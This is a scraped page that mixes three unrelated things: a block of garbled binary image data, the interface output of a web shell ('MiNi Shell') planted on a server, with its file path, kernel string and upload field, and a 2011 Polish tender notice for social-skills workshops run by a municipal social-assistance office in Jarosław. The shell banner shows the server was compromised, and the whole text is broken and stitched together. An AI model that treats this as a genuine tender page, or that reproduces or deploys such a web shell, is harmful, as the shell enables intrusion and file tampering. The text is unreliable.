JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20111005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20111005/321056-N-2011.html

<p class="kh_header"><b>Jarosław: -	Wyjazdowe warsztaty umiejętności społecznych</b><br>
<b>Numer ogłoszenia: 321056 - 2011; data zamieszczenia: 05.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Jarosławiu , ul. Piekarska 5, 37-500 Jarosław, woj. podkarpackie, tel. 16 624 86 29, faks 16 624 86 28.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ug.jaroslaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> -	Wyjazdowe warsztaty umiejętności społecznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i zrealizowanie wyjazdowych warsztatów umiejętności społecznych (WWUS) dla 15 osób spośród uczestników projektu systemowego Czas na aktywność w gminie Jarosław i członków ich rodzin w łącznej liczbie około 32 osób, 
dla:	
bezrobotnych mieszkańców Gminy Jarosław, nie pozostających w zatrudnieniu, będących jednocześnie w wieku aktywności zawodowej i korzystających ze świadczeń pomocy społecznej oraz dla co najmniej 5% osób niepełnosprawnych w ramach projektu Czas na aktywność w gminie Jarosław realizowanym w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI PRIORYTET VII Promocja integracji społecznej DZIAŁANIE 7.1 Rozwój i upowszechnianie aktywnej integracji PODDZIAŁANIE 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej współfinansowanych ze środków EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO
Ostateczna liczba uczestników może ulec zmianie w związku z zakwalifikowaniem do projektu nowych osób lub rezygnacją osób już zakwalifikowanych. 


1.	Przez wyjazdowe warsztaty umiejętności społecznych (WWUS) rozumie się:

a)	Organizację pobytu jednej grupy liczącej łącznie 32 osoby - zarówno dorosłe (około 19 osób, UP i ich otoczenie) jak i dzieci (przedział wiekowy od 3 lat do 7 lat -5 dzieci oraz przedział wiekowy od 8 lat do 17 lat - 8 dzieci, czyli łącznie około 13 dzieci) w ośrodku wczasowo szkoleniowym w Zakopanym. 
b)	Przeprowadzenie w czasie tego pobytu zajęć edukacyjno - warsztatowych dla uczestników projektów, tj. indywidualnych i grupowych spotkań z psychologiem, pedagogiem i radcą prawnym, których celem będzie trenowanie umiejętności społecznych, w tym dobrej komunikacji i zachowań ważnych dla wypełniania ról społecznych.
Spotkania Uczestników Projektu w trakcie WWUS mają zawierać następujące zajęcia:
- Z psychologiem  osoba mająca odpowiednie kwalifikacje grupowe - 2 godziny dydaktyczne oraz indywidualne wg potrzeb
Temat: Rozwijanie umiejętności związanej z organizacją życia rodzinnego poprzez budowanie pozytywnych relacji rodzice-dziecko-rodzice opartych na miłości a także doskonalenie umiejętności rodziców w zakresie porozumiewania się z dziećmi
- Z pedagogiem  osoba mająca odpowiednie kwalifikacje - grupowe - 2 godziny dydaktyczne oraz indywidualne wg potrzeb
Temat: Umiejętności związane z organizacją życia rodzinnego zarządzanie budżetem domowym a także planowanie i kontrolowanie wydatków
- z radcą prawnym  osoba mająca odpowiednie kwalifikacje grupowe 2 godziny dydaktyczne oraz indywidualne wg potrzeb
Temat: Zapoznanie uczestników projektu z regulacjami prawnymi:
Prawo rodzinne, ochrona przed przemocą w rodzinie, regulacje prawne dotyczące uzależnień służące przywróceniu samodzielności życiowej.
c)	Organizację zajęć dla dzieci w czasie spotkań grupowych rodziców.
d)	Organizację atrakcyjnych zajęć dodatkowych - w tym o charakterze integracyjnym - wycieczka krajoznawcza.



2.	Standard realizacji usługi:

1) Warunki, jakie powinien spełniać Ośrodek wczasowo-szkoleniowy:
a) pokoje umożliwiające zamieszkanie osobom samotnym lub rodzinom w odrębnych pokojach z możliwością dogrzewania w czasie chłodów;
b) pokoje wyposażone w łóżka z pościelą, szafy, szafki, stoliki, krzesła;
c) jadalnia usytuowana na terenie ośrodka;
d) oddzielna sala wyposażona min: w TV, sprzęt audio, doposażona w materiały biurowe,
materiały do zajęć dla dzieci (na terenie Ośrodka),
e) sala szkoleniowo-edukacyjna na zajęcia grupowe dla rodziców, mieszcząca całą społeczność, do spotkań z wszystkimi rodzinami (na terenie Ośrodka),
f) dobre warunki sanitarne, łazienki czyste ze sprawnym wyposażeniem,
g) wyposażenie sportowo-rekreacyjne.
2) Warunki jakie powinna spełniać kadra realizująca zajęcia dla osób dorosłych:
a) wykształcenie psychologiczne, pedagogiczne, prawne,
b) minimum dwuletnie doświadczenie zawodowe w prowadzeniu grupowych form pracy z
rodziną posiadanie udokumentowanych uprawnień trenerskich.
3) Warunki jakie powinna spełniać kadra realizująca zajęcia dla dzieci:
a) wykształcenie psychologiczne, pedagogiczne lub wykształcenie uprawniające do pracy w zawodzie nauczyciela oraz uprawnienia pedagogiczne,
b) minimum roczne doświadczenie zawodowe w prowadzeniu grupowych form pracy z dziećmi.
3.	Warunki realizacji usługi:

1)	WWUS zostaną zorganizowane dla grupy uczestników liczącej łącznie około 32 osób - zarówno dorosłe (około 19 osób, UP i ich otoczenie) jak i dzieci (przedział wiekowy od 3 lat do 7 lat -5 dzieci oraz przedział wiekowy od 8 lat do 17 lat - 8 dzieci, czyli łącznie około 13 dzieci). 
2) Przy organizacji zajęć dla dzieci Wykonawca powinien uwzględnić konieczność dostosowania formuły treści zajęć do możliwości i potrzeb dzieci ze szczególnym uwzględnieniem ich wieku. 
3) Wykonawca zapewnia spotkania grup uczestników w wymiarze 2 godz. lekcyjnych z pedagogiem, 2 godziny lekcyjne z psychologiem, 2 godziny lekcyjne z radcą prawnym. W tym samym czasie wykonawca zorganizuje rozwojowe zajęcia grupowe dla dzieci i młodzieży. Poza treningiem i zajęciami dla dzieci wykonawca zorganizuje zajęcia o charakterze integracyjnym, np. imprezy kulturalno-rekreacyjne, wspólne ognisko, wycieczki z udziałem całych rodzin, spotkania rozwojowe dla uczestników.
4) Wykonawca zapewnia transport autokarem do miejsca wypoczynku i z powrotem, osobę
odpowiedzialną za prawidłową odprawę z miejsca wyjazdu.
5) Wykonawca zapewnia ubezpieczenie NNW w czasie podróży i pobytu uczestników na treningu wyjazdowym.
6) Wykonawca zapewnia 3-dniowy pobyt rodzin w ośrodku (w tym 2 noclegi), pełne wyżywienie (4 posiłki dziennie - śniadanie, obiad, kolacja, podwieczorek).
7) Wykonawca zapewnia poczęstunek i napoje w trakcie przerw w zajęciach dla dorosłych
uczestników treningu oraz dla dzieci.
8) Wykonawca zapewnia wykwalifikowaną kadrę psychologiczno-pedagogiczną i prawną w czasie realizacji zadania. 
9) Wykonawca zapewnia sprawny technicznie autokar, posiadający w dniu wyjazdu wszystkie aktualne dokumenty wymagane do przewozów pasażerów.
10) Wykonawca zapewnia również wszelkie niezbędne do prowadzenia WWUS pomoce (testy, art. biurowe itp.), a po zakończeniu treningu wydaje zaświadczenia potwierdzenia udziału.

4.	Zamawiający dopuszcza zmianę liczby uczestników, jednak nie więcej niż + - 20% , pełnoletnich uczestników oraz nie więcej niż + - 20 % dzieci. Listę uczestników zleceniodawca dostarczy wykonawcy 7 dni roboczych przed terminem wyjazdu.

5.	Usługa zostanie zrealizowana 25, 26, 27 listopad 2011r.

6.	Wykonawca prowadzi następującą dokumentację:

1) Listy obecności dorosłych uczestników - wraz z podpisami uczestników (potwierdzone przez prowadzącego).
2) Listy obecności dzieci uczestników wraz z podpisami rodzica/opiekuna - (potwierdzone przez prowadzącego).
3) Program realizacji zajęć dla każdej z grup (dzieci i dorośli) - zawierający wykaz planowanych zajęć wraz z terminami.
4) W terminie do 5 dni roboczych od podpisania umowy Wykonawca dostarcza Zamawiającemu opracowany program zajęć w celu jego akceptacji oraz wskazuje terminy realizacji Wyjazdowych Warsztatów Umiejętności Społecznych.

7.	Prowadzenie ewaluacji i sprawozdawczość:

1) zobowiązuje się Wykonawcę do przeprowadzenia badań ewaluacyjnych, na początku i na zakończenie WWUS (np. w formie ankiet ewaluacyjnych lub innego narzędzia, które powinno zawierać: 
- opinię uczestnika dotyczącą posiadanej wiedzy i umiejętności będących przedmiotem pracy w WWUS, przed i po zakończeniu uczestnictwa; 
- wzbogacenie kompetencji wychowawczych, nabycie umiejętności asertywnego wyrażania swoich poglądów, myśli, uczuć i potrzeb co najmniej u 50% UP
- podniesienie umiejętności radzenia sobie z zarządzaniem finansami budżetem domowym  co najmniej u 50% UP
- podwyższenie świadomości UP o jego prawach i uprawnieniach, co najmniej u 50% UP
- nauczenie UP aktywnych form spędzania czasu, co najmniej u 50% UP
- ocenę osób prowadzących zajęcia przez uczestników, ich kompetencji, sposobu prowadzenia zajęć; 
- ocenę warunków socjalnych pomieszczeń, w których realizowany był WWUS. 
- zastosowane narzędzie ewaluacyjne powinno wykazać, w jakim stopniu udział uczestnika w zajęciach WWUS przyczynił się do osiągnięcia rezultatów założonych w projekcie.
2) wykonawca w terminie 7 dni od zakończenia realizacji usługi wykonawca załącza m.in.:
a) ankiety ewaluacyjne przeprowadzone na początku i na zakończenie WWUS z obliczeniem procentowym
b) wykaz osób realizujących WWUS;
c) egzemplarz narzędzia ewaluacyjnego;
d) listy obecności;
e) kopie zaświadczeń wydanych uczestnikom na zakończenie realizacji WWUS;
Wykonawca jest zobowiązany nanieść wnioskowane poprawki w terminie 3 dni roboczych po
otrzymaniu uwag. Przyjmuje się, że brak akceptacji w terminie raportu równoznaczny jest z
brakiem możliwości rozliczenia realizacji usługi przez Zamawiającego.

8.	Po zakończeniu realizacji zadania, dokumentacja tworzona na podstawie umowy, zostanie zarchiwizowana przez Wykonawcę zgodnie z obowiązującymi w tym zakresie przepisami i będzie przechowywana, co najmniej do dnia 31.12.2020r. Wykonawca zobowiązany jest do przedłożenia wytworzonej dokumentacji w razie kontroli dokonywanej przez Zamawiającego, Instytucję Pośredniczącą oraz inne uprawnione podmioty w zakresie prawidłowości realizacji Projektu systemowego. Zamawiający zastrzega sobie możliwość wydłużenia tego okresu. Wykonawca zobowiązuje się poddać kontroli dokonywanej przez Zamawiającego, Instytucję Pośredniczącą oraz inne uprawnione podmioty w zakresie prawidłowości realizacji Projektu systemowego.

9. Przedmiotowe zamówienie jest realizowane w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 i współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Społecznego. Realizacja zamówienia odbywać się będzie z zachowaniem wymogów dotyczących informowania uczestników, jak również otoczenia, o współfinansowaniu projektu z EFS, w szczególności w zakresie prowadzonej dokumentacji i miejsca realizacji projektu. Zobowiązuje się wykonawcę do zamieszczania informacji o współfinansowaniu z EFS, zgodnie z aktualnie obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach PO KL na wszelkich powstających w trakcie projektu dokumentach i materiałach.

10. Wymagania dotyczące zorganizowania i zrealizowania wyjazdowych warsztatów umiejętności społecznych określa umowa stanowiąca załącznik nr 1..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 55.24.00.00-4, 55.24.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 25.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp.
Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast w/w dokumentów, składają odpowiednie dokumenty zgodnie z przepisami § 4 rozporządzenia wykonawczego do ustawy Prawo zamówień publicznych w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (rozporządzenie Prezesa Rady Ministrów z dnia 30.12.2009r. Dz. U. Nr 226, poz. 1817).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości,
przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te
usługi zostały wykonane lub są wykonywane należycie - załącznik nr 3 do specyfikacji,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>) opis bazy lokalowej (ośrodka wczasowo-szkoleniowego) z uwzględnieniem minimalnych
standardów opisanych w części III pkt. 1 ppkt. 3) specyfikacji - załącznik nr 6 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności
odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji
zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także
zakresu wykonywanych przez nie czynności, wraz z informacją o podstawie do dysponowania tymi osobami - załącznik nr 4 do specyfikacji,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca przedstawi aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, oraz właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ug.jaroslaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Jarosławiu
ul. Piekarska 5, 37-500 Jarosław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2011 godzina 09:00, miejsce: GOPS Jarosław ul. Piekarska 5, pok. 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROGRAM OPERACYJNY KAPITAŁ LUDZKI PRIORYTET VII Promocja integracji społecznej DZIAŁANIE 7.1 Rozwój i upowszechnianie aktywnej integracji PODDZIAŁANIE 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej współfinansowanych ze środków EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com